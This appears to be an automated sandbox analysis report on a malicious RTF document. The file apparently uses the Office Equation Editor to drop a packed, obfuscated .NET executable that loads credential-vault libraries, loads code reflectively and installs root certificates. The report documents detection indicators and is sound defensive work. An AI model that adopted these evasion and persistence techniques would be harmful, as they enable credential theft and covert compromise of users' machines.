                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: 2FBexXRCHR.LNK.0.drLNK file: ..\..\..\..\..\Desktop\2FBexXRCHR.rtf
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.cs.Net Code: oQDraBlY6e System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.cs.Net Code: oQDraBlY6e System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.winiti.exe.2485fb8.3.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.winiti.exe.2485fb8.3.raw.unpack, PingPong.cs.Net Code: Justy
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.cs.Net Code: oQDraBlY6e System.Reflection.Assembly.Load(byte[])
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00307832 push ebx; ret 2_2_00307833
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00307A36 push ebx; ret 2_2_00307A37
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0030783A push ebx; ret 2_2_0030783B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00306B1B push edi; ret 2_2_00306B47
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0030731E push ebx; ret 2_2_0030731F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00306B0B push edi; ret 2_2_00306B17
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00306B76 push edi; ret 2_2_00306B77
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002F8F60 push eax; retf 2_2_002F8F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00306B4E push edi; ret 2_2_00306B57
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003079B4 push ebx; ret 2_2_003079B7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003069AC push edi; ret 2_2_00306A97
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002FC288 pushad ; retn 002Fh2_2_002FC289
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00306CF2 push edi; ret 2_2_00306CF3
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002F01F4 push eax; retf 2_2_002F01F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00306AEB push edi; ret 2_2_00306AF7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002FC3F0 push A0002FC4h; ret 2_2_002FC3F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003077D2 push ebx; ret 2_2_003077D3
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003069CC push edi; ret 2_2_00306A97
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019B260 pushfd ; iretd 5_2_0019B26D
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019AD35 push esp; retf 5_2_0019AD36
                    Source: winiti[1].exe.2.drStatic PE information: section name: .text entropy: 7.962364275489502
                    Source: winiti.exe.2.drStatic PE information: section name: .text entropy: 7.962364275489502
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, VowUMM871Fp8bDemBP.csHigh entropy of concatenated method names: 'zg9NYQMDKL', 'gr9NyR2uIg', 'FjPNZeB3hh', 'COPZl1kGnD', 'ROJZzo0OQT', 'n03Ni2bJSi', 'fOPNcmWdZw', 'Ok1NxuDJSn', 'tNTN2HAADS', 'k31NrSbbHO'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, bLe1PVPXUhjRYjopUa.csHigh entropy of concatenated method names: 'SyeLk60tW4', 'hPNLEIREsG', 'DteLnPwbjp', 'VScLQyWdfy', 'M89LSDXina', 'yuJLfyVN5w', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.csHigh entropy of concatenated method names: 'XVh2Gyi6t8', 'hBk2YctEcf', 'U0F2j1g4Sv', 'Ijo2ytU9fJ', 'LMe2otdIYh', 'gbZ2ZQTjvv', 'rdF2Na0qE8', 'ePD2JuGhHT', 'DY62FcglJh', 'bHI2ABrSVB'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, X7eG0gqJtgFhfpo9cM.csHigh entropy of concatenated method names: 'bj1LYGylCf', 'DuILjg4Dy9', 'lWkLyDSM5Q', 'nwLLo67wt3', 'UYyLZuUlC1', 'jFSLN1EsAx', 'OdNLJxlV3l', 'qbVLF7g1mR', 'OjoLAHE5LB', 'xj0LKo2doe'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, bejyHZrHlbbQAjmPBF.csHigh entropy of concatenated method names: 'vnqcN1lGeN', 'dqacJ9Rypn', 'zYCcAyZPlc', 'rn4cKFjT12', 'LUGcObk3mR', 'PLOc3IxEnr', 'Vy8Ep7TJOShcrX5SCi', 'TNSZPuxa3W7DKHfEpy', 'Pm1cchrIdn', 'UULc2eXrSk'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, EHf4hJcibXDdIwrcxWa.csHigh entropy of concatenated method names: 'GPh5pEEQct', 'G8X5661gvI', 'CZy5a4U08p', 'nZq5DoGqW3', 'qtQ5vDuOw5', 'Dbd5gNEK89', 'gWY5Mrs8GO', 'WPk5tB5Bqy', 'quU5Vp7nWO', 'Vlm5COD7hk'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, yCyWgaVYCyZPlcLn4F.csHigh entropy of concatenated method names: 'HAkyDvYNmP', 'SZUygFHJ2Z', 'OB6ytO5xS2', 'FqoyVSWLUw', 'R2gyO81kuG', 'Byny3n9PuV', 'ldIyRO4C0b', 'b3AyLdkjvC', 'lVcy5bsjsd', 'iAyyBye0YT'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, VtoD4klVEdWHcS8xeB.csHigh entropy of concatenated method names: 'UKy5cLfb4A', 'pAC520I54m', 'kU65rwnIB8', 'Rn75Y4D6QV', 'V5o5jcNDob', 'kaI5o1TUkf', 'v5r5ZRd5oW', 'RmSL4qW8B5', 'j6vLqtV9OZ', 'OT5LP8RBa3'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, X1lGeNtrqa9RypnK1A.csHigh entropy of concatenated method names: 'YgDjSugHe4', 'DT5jH0yfm8', 'KRUjXQ6YTs', 'uAxjUmo3CE', 'P0njm9FbH3', 'WAAjuAM8tH', 'vsej4E0JEX', 'pXUjqZuKT1', 'faUjPRECx7', 'MJEjlVNm5U'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, xVUQskdyggVyKpAr72.csHigh entropy of concatenated method names: 'f7vwtj0SC7', 'VPSwVAQLac', 'KCxwkD0K3U', 'q4kwEhbKvQ', 'HqmwQXNXqe', 'Vvkwf2A3la', 'BjBw8A9SUF', 'jA7wek2HYU', 'pQkwbBk9qP', 'Q2kw9F4BSc'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, iRONNpzmxgNG0DqyUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T1m5wH5Yn9', 'c4f5OG4nxb', 'l8l53mMuSI', 'oYl5RVOprX', 'MBE5LPrRa5', 'HqA55jdoXd', 'JZt5BrVR7F'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, pmR0LOkIxEnrctQD2X.csHigh entropy of concatenated method names: 'qABZGbaA0y', 'aYfZjSI0TR', 'ElfZoYxmKo', 'BBoZNK6vIh', 'C9IZJ9JLvg', 'lFUomIWgoi', 'APoou49NSs', 'CCNo4uAXLe', 'UbooqD3BQ1', 'hXIoP1GXO3'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, HJtwWsj8mZcgkhR8CY.csHigh entropy of concatenated method names: 'Dispose', 'NsocPAKa0p', 'KCHxEd7Emf', 'R2O11l3QCo', 'kP7cleG0gJ', 'DgFczhfpo9', 'ProcessDialogKey', 'aMcxiLe1PV', 'SUhxcjRYjo', 'xUaxxutoD4'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, B5YNRDX6ACF01eAiIM.csHigh entropy of concatenated method names: 'ToString', 'Nsu390Z1BA', 'SaK3ENTDJv', 'hYv3nYwqOF', 'l5p3QpgJcf', 'nxv3fUV4C0', 'Emm3IFGDOo', 'Gci38T8Vuf', 'lfZ3elmMS4', 'SmP3hsFWrT'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, VFbsN9QyklDZced5yE.csHigh entropy of concatenated method names: 'XI9ZWFwfw3', 'MB4Zpjy1Dv', 'JydZabIBKP', 'LlDZDr8k0K', 'NVnZg9hrSP', 'psfZMdItIL', 'SuGZVx1T8N', 'vVgZCUskbI', 'hk6skP40O4dnFp3QKhA', 'Ku7SwC4EoRAAoQHc0w5'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, U53X4duKhnr0sejxel.csHigh entropy of concatenated method names: 'q9dRqDGSLG', 'XXCRltWufr', 'f9hLiNpZdr', 'mXYLci3loj', 'qU7R9xDhQu', 'NXwR00hpPM', 'YNVRdI8EpX', 'pvERS8IniO', 'oOdRHqhjL0', 'hPORXC46NU'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, gBacBfc2y4FvbqjllAT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qNcBSa7Y5T', 'KHgBHecyXO', 'lRLBXZcd9H', 'LarBUEe9K9', 'pRWBm6E5qj', 'G32BunBv4O', 'b0vB4PbFXQ'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, l6A1ftxPNHNC6cEnNj.csHigh entropy of concatenated method names: 'MVqa9qiYD', 'Sv6DW5jXs', 'ccBgf7sAh', 'osjMMM8ul', 'Ra9VrVpAf', 'CSLCwFUEI', 'TY9Mjc82YuAdgD8rdA', 'yu16YS1rXxrEQugYJi', 'p80LVcEuh', 'DBYBgpLq1'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, gT12ZpCTTqeGReUGbk.csHigh entropy of concatenated method names: 'dLLovp63h9', 'W2loMMWpMV', 'R7PynHqqJc', 'Vq8yQJykct', 'ej6yf5RgtJ', 'fudyI4EVAe', 'cH7y8Ru1c8', 'Uc4yeTWctG', 'jusyhnZrry', 'hM3ybR2iyc'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, OLaIZShKLuCmYa6fj7.csHigh entropy of concatenated method names: 'u1WNpQWdGg', 'YJ5N6gw1sU', 'gJZNaklB4w', 'xkNNDuXVAC', 'KOkNv2uvko', 't2aNgvY8cw', 'y3UNMD6XNP', 'SgANtVvx2q', 'Pk4NVwtCu7', 'J9mNCWetml'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, VowUMM871Fp8bDemBP.csHigh entropy of concatenated method names: 'zg9NYQMDKL', 'gr9NyR2uIg', 'FjPNZeB3hh', 'COPZl1kGnD', 'ROJZzo0OQT', 'n03Ni2bJSi', 'fOPNcmWdZw', 'Ok1NxuDJSn', 'tNTN2HAADS', 'k31NrSbbHO'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, bLe1PVPXUhjRYjopUa.csHigh entropy of concatenated method names: 'SyeLk60tW4', 'hPNLEIREsG', 'DteLnPwbjp', 'VScLQyWdfy', 'M89LSDXina', 'yuJLfyVN5w', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.csHigh entropy of concatenated method names: 'XVh2Gyi6t8', 'hBk2YctEcf', 'U0F2j1g4Sv', 'Ijo2ytU9fJ', 'LMe2otdIYh', 'gbZ2ZQTjvv', 'rdF2Na0qE8', 'ePD2JuGhHT', 'DY62FcglJh', 'bHI2ABrSVB'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, X7eG0gqJtgFhfpo9cM.csHigh entropy of concatenated method names: 'bj1LYGylCf', 'DuILjg4Dy9', 'lWkLyDSM5Q', 'nwLLo67wt3', 'UYyLZuUlC1', 'jFSLN1EsAx', 'OdNLJxlV3l', 'qbVLF7g1mR', 'OjoLAHE5LB', 'xj0LKo2doe'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, bejyHZrHlbbQAjmPBF.csHigh entropy of concatenated method names: 'vnqcN1lGeN', 'dqacJ9Rypn', 'zYCcAyZPlc', 'rn4cKFjT12', 'LUGcObk3mR', 'PLOc3IxEnr', 'Vy8Ep7TJOShcrX5SCi', 'TNSZPuxa3W7DKHfEpy', 'Pm1cchrIdn', 'UULc2eXrSk'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, EHf4hJcibXDdIwrcxWa.csHigh entropy of concatenated method names: 'GPh5pEEQct', 'G8X5661gvI', 'CZy5a4U08p', 'nZq5DoGqW3', 'qtQ5vDuOw5', 'Dbd5gNEK89', 'gWY5Mrs8GO', 'WPk5tB5Bqy', 'quU5Vp7nWO', 'Vlm5COD7hk'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, yCyWgaVYCyZPlcLn4F.csHigh entropy of concatenated method names: 'HAkyDvYNmP', 'SZUygFHJ2Z', 'OB6ytO5xS2', 'FqoyVSWLUw', 'R2gyO81kuG', 'Byny3n9PuV', 'ldIyRO4C0b', 'b3AyLdkjvC', 'lVcy5bsjsd', 'iAyyBye0YT'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, VtoD4klVEdWHcS8xeB.csHigh entropy of concatenated method names: 'UKy5cLfb4A', 'pAC520I54m', 'kU65rwnIB8', 'Rn75Y4D6QV', 'V5o5jcNDob', 'kaI5o1TUkf', 'v5r5ZRd5oW', 'RmSL4qW8B5', 'j6vLqtV9OZ', 'OT5LP8RBa3'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, X1lGeNtrqa9RypnK1A.csHigh entropy of concatenated method names: 'YgDjSugHe4', 'DT5jH0yfm8', 'KRUjXQ6YTs', 'uAxjUmo3CE', 'P0njm9FbH3', 'WAAjuAM8tH', 'vsej4E0JEX', 'pXUjqZuKT1', 'faUjPRECx7', 'MJEjlVNm5U'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, xVUQskdyggVyKpAr72.csHigh entropy of concatenated method names: 'f7vwtj0SC7', 'VPSwVAQLac', 'KCxwkD0K3U', 'q4kwEhbKvQ', 'HqmwQXNXqe', 'Vvkwf2A3la', 'BjBw8A9SUF', 'jA7wek2HYU', 'pQkwbBk9qP', 'Q2kw9F4BSc'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, iRONNpzmxgNG0DqyUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T1m5wH5Yn9', 'c4f5OG4nxb', 'l8l53mMuSI', 'oYl5RVOprX', 'MBE5LPrRa5', 'HqA55jdoXd', 'JZt5BrVR7F'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, pmR0LOkIxEnrctQD2X.csHigh entropy of concatenated method names: 'qABZGbaA0y', 'aYfZjSI0TR', 'ElfZoYxmKo', 'BBoZNK6vIh', 'C9IZJ9JLvg', 'lFUomIWgoi', 'APoou49NSs', 'CCNo4uAXLe', 'UbooqD3BQ1', 'hXIoP1GXO3'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, HJtwWsj8mZcgkhR8CY.csHigh entropy of concatenated method names: 'Dispose', 'NsocPAKa0p', 'KCHxEd7Emf', 'R2O11l3QCo', 'kP7cleG0gJ', 'DgFczhfpo9', 'ProcessDialogKey', 'aMcxiLe1PV', 'SUhxcjRYjo', 'xUaxxutoD4'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, B5YNRDX6ACF01eAiIM.csHigh entropy of concatenated method names: 'ToString', 'Nsu390Z1BA', 'SaK3ENTDJv', 'hYv3nYwqOF', 'l5p3QpgJcf', 'nxv3fUV4C0', 'Emm3IFGDOo', 'Gci38T8Vuf', 'lfZ3elmMS4', 'SmP3hsFWrT'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, VFbsN9QyklDZced5yE.csHigh entropy of concatenated method names: 'XI9ZWFwfw3', 'MB4Zpjy1Dv', 'JydZabIBKP', 'LlDZDr8k0K', 'NVnZg9hrSP', 'psfZMdItIL', 'SuGZVx1T8N', 'vVgZCUskbI', 'hk6skP40O4dnFp3QKhA', 'Ku7SwC4EoRAAoQHc0w5'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, U53X4duKhnr0sejxel.csHigh entropy of concatenated method names: 'q9dRqDGSLG', 'XXCRltWufr', 'f9hLiNpZdr', 'mXYLci3loj', 'qU7R9xDhQu', 'NXwR00hpPM', 'YNVRdI8EpX', 'pvERS8IniO', 'oOdRHqhjL0', 'hPORXC46NU'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, gBacBfc2y4FvbqjllAT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qNcBSa7Y5T', 'KHgBHecyXO', 'lRLBXZcd9H', 'LarBUEe9K9', 'pRWBm6E5qj', 'G32BunBv4O', 'b0vB4PbFXQ'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, l6A1ftxPNHNC6cEnNj.csHigh entropy of concatenated method names: 'MVqa9qiYD', 'Sv6DW5jXs', 'ccBgf7sAh', 'osjMMM8ul', 'Ra9VrVpAf', 'CSLCwFUEI', 'TY9Mjc82YuAdgD8rdA', 'yu16YS1rXxrEQugYJi', 'p80LVcEuh', 'DBYBgpLq1'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, gT12ZpCTTqeGReUGbk.csHigh entropy of concatenated method names: 'dLLovp63h9', 'W2loMMWpMV', 'R7PynHqqJc', 'Vq8yQJykct', 'ej6yf5RgtJ', 'fudyI4EVAe', 'cH7y8Ru1c8', 'Uc4yeTWctG', 'jusyhnZrry', 'hM3ybR2iyc'
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, OLaIZShKLuCmYa6fj7.csHigh entropy of concatenated method names: 'u1WNpQWdGg', 'YJ5N6gw1sU', 'gJZNaklB4w', 'xkNNDuXVAC', 'KOkNv2uvko', 't2aNgvY8cw', 'y3UNMD6XNP', 'SgANtVvx2q', 'Pk4NVwtCu7', 'J9mNCWetml'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, VowUMM871Fp8bDemBP.csHigh entropy of concatenated method names: 'zg9NYQMDKL', 'gr9NyR2uIg', 'FjPNZeB3hh', 'COPZl1kGnD', 'ROJZzo0OQT', 'n03Ni2bJSi', 'fOPNcmWdZw', 'Ok1NxuDJSn', 'tNTN2HAADS', 'k31NrSbbHO'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, bLe1PVPXUhjRYjopUa.csHigh entropy of concatenated method names: 'SyeLk60tW4', 'hPNLEIREsG', 'DteLnPwbjp', 'VScLQyWdfy', 'M89LSDXina', 'yuJLfyVN5w', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.csHigh entropy of concatenated method names: 'XVh2Gyi6t8', 'hBk2YctEcf', 'U0F2j1g4Sv', 'Ijo2ytU9fJ', 'LMe2otdIYh', 'gbZ2ZQTjvv', 'rdF2Na0qE8', 'ePD2JuGhHT', 'DY62FcglJh', 'bHI2ABrSVB'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, X7eG0gqJtgFhfpo9cM.csHigh entropy of concatenated method names: 'bj1LYGylCf', 'DuILjg4Dy9', 'lWkLyDSM5Q', 'nwLLo67wt3', 'UYyLZuUlC1', 'jFSLN1EsAx', 'OdNLJxlV3l', 'qbVLF7g1mR', 'OjoLAHE5LB', 'xj0LKo2doe'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, bejyHZrHlbbQAjmPBF.csHigh entropy of concatenated method names: 'vnqcN1lGeN', 'dqacJ9Rypn', 'zYCcAyZPlc', 'rn4cKFjT12', 'LUGcObk3mR', 'PLOc3IxEnr', 'Vy8Ep7TJOShcrX5SCi', 'TNSZPuxa3W7DKHfEpy', 'Pm1cchrIdn', 'UULc2eXrSk'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, EHf4hJcibXDdIwrcxWa.csHigh entropy of concatenated method names: 'GPh5pEEQct', 'G8X5661gvI', 'CZy5a4U08p', 'nZq5DoGqW3', 'qtQ5vDuOw5', 'Dbd5gNEK89', 'gWY5Mrs8GO', 'WPk5tB5Bqy', 'quU5Vp7nWO', 'Vlm5COD7hk'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, yCyWgaVYCyZPlcLn4F.csHigh entropy of concatenated method names: 'HAkyDvYNmP', 'SZUygFHJ2Z', 'OB6ytO5xS2', 'FqoyVSWLUw', 'R2gyO81kuG', 'Byny3n9PuV', 'ldIyRO4C0b', 'b3AyLdkjvC', 'lVcy5bsjsd', 'iAyyBye0YT'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, VtoD4klVEdWHcS8xeB.csHigh entropy of concatenated method names: 'UKy5cLfb4A', 'pAC520I54m', 'kU65rwnIB8', 'Rn75Y4D6QV', 'V5o5jcNDob', 'kaI5o1TUkf', 'v5r5ZRd5oW', 'RmSL4qW8B5', 'j6vLqtV9OZ', 'OT5LP8RBa3'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, X1lGeNtrqa9RypnK1A.csHigh entropy of concatenated method names: 'YgDjSugHe4', 'DT5jH0yfm8', 'KRUjXQ6YTs', 'uAxjUmo3CE', 'P0njm9FbH3', 'WAAjuAM8tH', 'vsej4E0JEX', 'pXUjqZuKT1', 'faUjPRECx7', 'MJEjlVNm5U'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, xVUQskdyggVyKpAr72.csHigh entropy of concatenated method names: 'f7vwtj0SC7', 'VPSwVAQLac', 'KCxwkD0K3U', 'q4kwEhbKvQ', 'HqmwQXNXqe', 'Vvkwf2A3la', 'BjBw8A9SUF', 'jA7wek2HYU', 'pQkwbBk9qP', 'Q2kw9F4BSc'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, iRONNpzmxgNG0DqyUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T1m5wH5Yn9', 'c4f5OG4nxb', 'l8l53mMuSI', 'oYl5RVOprX', 'MBE5LPrRa5', 'HqA55jdoXd', 'JZt5BrVR7F'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, pmR0LOkIxEnrctQD2X.csHigh entropy of concatenated method names: 'qABZGbaA0y', 'aYfZjSI0TR', 'ElfZoYxmKo', 'BBoZNK6vIh', 'C9IZJ9JLvg', 'lFUomIWgoi', 'APoou49NSs', 'CCNo4uAXLe', 'UbooqD3BQ1', 'hXIoP1GXO3'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, HJtwWsj8mZcgkhR8CY.csHigh entropy of concatenated method names: 'Dispose', 'NsocPAKa0p', 'KCHxEd7Emf', 'R2O11l3QCo', 'kP7cleG0gJ', 'DgFczhfpo9', 'ProcessDialogKey', 'aMcxiLe1PV', 'SUhxcjRYjo', 'xUaxxutoD4'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, B5YNRDX6ACF01eAiIM.csHigh entropy of concatenated method names: 'ToString', 'Nsu390Z1BA', 'SaK3ENTDJv', 'hYv3nYwqOF', 'l5p3QpgJcf', 'nxv3fUV4C0', 'Emm3IFGDOo', 'Gci38T8Vuf', 'lfZ3elmMS4', 'SmP3hsFWrT'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, VFbsN9QyklDZced5yE.csHigh entropy of concatenated method names: 'XI9ZWFwfw3', 'MB4Zpjy1Dv', 'JydZabIBKP', 'LlDZDr8k0K', 'NVnZg9hrSP', 'psfZMdItIL', 'SuGZVx1T8N', 'vVgZCUskbI', 'hk6skP40O4dnFp3QKhA', 'Ku7SwC4EoRAAoQHc0w5'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, U53X4duKhnr0sejxel.csHigh entropy of concatenated method names: 'q9dRqDGSLG', 'XXCRltWufr', 'f9hLiNpZdr', 'mXYLci3loj', 'qU7R9xDhQu', 'NXwR00hpPM', 'YNVRdI8EpX', 'pvERS8IniO', 'oOdRHqhjL0', 'hPORXC46NU'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, gBacBfc2y4FvbqjllAT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qNcBSa7Y5T', 'KHgBHecyXO', 'lRLBXZcd9H', 'LarBUEe9K9', 'pRWBm6E5qj', 'G32BunBv4O', 'b0vB4PbFXQ'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, l6A1ftxPNHNC6cEnNj.csHigh entropy of concatenated method names: 'MVqa9qiYD', 'Sv6DW5jXs', 'ccBgf7sAh', 'osjMMM8ul', 'Ra9VrVpAf', 'CSLCwFUEI', 'TY9Mjc82YuAdgD8rdA', 'yu16YS1rXxrEQugYJi', 'p80LVcEuh', 'DBYBgpLq1'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, gT12ZpCTTqeGReUGbk.csHigh entropy of concatenated method names: 'dLLovp63h9', 'W2loMMWpMV', 'R7PynHqqJc', 'Vq8yQJykct', 'ej6yf5RgtJ', 'fudyI4EVAe', 'cH7y8Ru1c8', 'Uc4yeTWctG', 'jusyhnZrry', 'hM3ybR2iyc'
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, OLaIZShKLuCmYa6fj7.csHigh entropy of concatenated method names: 'u1WNpQWdGg', 'YJ5N6gw1sU', 'gJZNaklB4w', 'xkNNDuXVAC', 'KOkNv2uvko', 't2aNgvY8cw', 'y3UNMD6XNP', 'SgANtVvx2q', 'Pk4NVwtCu7', 'J9mNCWetml'

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
